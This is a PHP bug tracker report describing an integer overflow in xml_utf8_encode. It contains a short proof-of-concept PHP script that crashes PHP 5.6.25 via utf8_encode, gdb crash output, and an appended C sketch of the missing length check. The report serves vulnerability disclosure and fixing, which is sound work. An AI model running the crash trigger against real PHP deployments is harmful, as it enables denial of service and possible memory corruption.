[2016-08-23 10:43 UTC] ahihibughunter at gmail dot com
-Type: Bug
+Type: Security
-Private report: No
+Private report: Yes
[2016-08-23 10:43 UTC] ahihibughunter at gmail dot com
[2016-09-02 06:32 UTC] stas@php.net
-Assigned To:
+Assigned To: stas
[2016-09-02 06:32 UTC] stas@php.net
[2016-09-02 15:21 UTC] ahihibughunter at gmail dot com
[2016-09-13 04:12 UTC] stas@php.net
-Status: Assigned
+Status: Closed
[2016-09-13 04:12 UTC] stas@php.net
[2017-02-13 01:27 UTC] stas@php.net
-Type: Security
+Type: Bug
Description:
------------
In the xml_utf8_encode function, the safe_emalloc did not check the value it allocates for the string, which is used to store the result of the encoded buffer. This causes the length of the string after encoding to be > INT_MAX.

PHPAPI char *xml_utf8_encode(const char *s, int len, int *newlen, const XML_Char *encoding)
{
    .....
    newbuf = safe_emalloc(len, 4, 1); //<- must check size of safe_emalloc here,
    ....
    } else if (c < 0x800) {
        newbuf[(*newlen)++] = (0xc0 | (c >> 6));
        newbuf[(*newlen)++] = (0x80 | (c & 0x3f));
    ...
}

Test script:
---------------
<?php
ini_set('memory_limit', -1);
$a = str_repeat('Ã', (0xffffffff/6) - 10);
$b = utf8_encode($a);
?>

Expected result:
----------------
No crash

Actual result:
--------------
$gdb /data/php-src-PHP-5.6.25/sapi/cli/php
GNU gdb (Ubuntu 7.7.1-0ubuntu5~14.04.2) 7.7.1
Copyright (C) 2014 Free Software Foundation, Inc.
Program received signal SIGSEGV, Segmentation fault.
0x000000000095b841 in xml_utf8_encode (
    s=0x7fffd95e9070 'Ã' <repeats 100 times>..., len=1431655744, newlen=0x7fffffffabb0, encoding=0x10a27f1 "ISO-8859-1") at /data/php-src-PHP-5.6.25/ext/xml/xml.c:642
642	newbuf[(*newlen)++] = (0xc0 | (c >> 6));
(gdb)
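
Added example (not part of the original report and not php-src code): a stand-alone C sketch of the length check the report asks for, using the len value from the gdb trace. The function names are hypothetical. It assumes a 32-bit int and handles only ISO-8859-1 input, the encoding shown in the trace, where each input byte yields at most two output bytes.

```c
#include <limits.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>

/* Value of a 32-bit signed counter after `total` increments (two's-complement
 * wraparound; int assumed 32 bits, as on the platform in the trace). */
long long wrapped_int_counter(unsigned long long total)
{
    long long v = (long long)(total & 0xffffffffULL);
    return v > 0x7fffffffLL ? v - 0x100000000LL : v;
}

/* 1 if the worst case (2 output bytes per input byte, plus NUL) fits in int. */
int encoded_len_fits_int(size_t len)
{
    return len <= ((size_t)INT_MAX - 1) / 2;
}

/* ISO-8859-1 -> UTF-8, bound checked before allocating or writing. Returns a
 * malloc'd NUL-terminated buffer, or NULL if *newlen could not hold the size. */
char *latin1_to_utf8_checked(const char *s, size_t len, int *newlen)
{
    size_t out = 0; /* unsigned index: can never become a negative offset */
    char *buf;
    *newlen = 0;
    if (!encoded_len_fits_int(len) || (buf = malloc(len * 2 + 1)) == NULL)
        return NULL;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)s[i];
        if (c < 0x80) {
            buf[out++] = (char)c;
        } else { /* same two-byte form as the excerpt's c < 0x800 branch */
            buf[out++] = (char)(0xc0 | (c >> 6));
            buf[out++] = (char)(0x80 | (c & 0x3f));
        }
    }
    buf[out] = '\0';
    *newlen = (int)out; /* safe: out <= 2 * len <= INT_MAX - 1 */
    return buf;
}

int main(void)
{
    printf("%lld %d\n", wrapped_int_counter(2ULL * 1431655744ULL),
           encoded_len_fits_int((size_t)1431655744));
    return 0;
}
```

With len=1431655744 the encoded size is 2863311488 bytes, so an int counter used as the write index ends up negative, while the checked version refuses the input before any write.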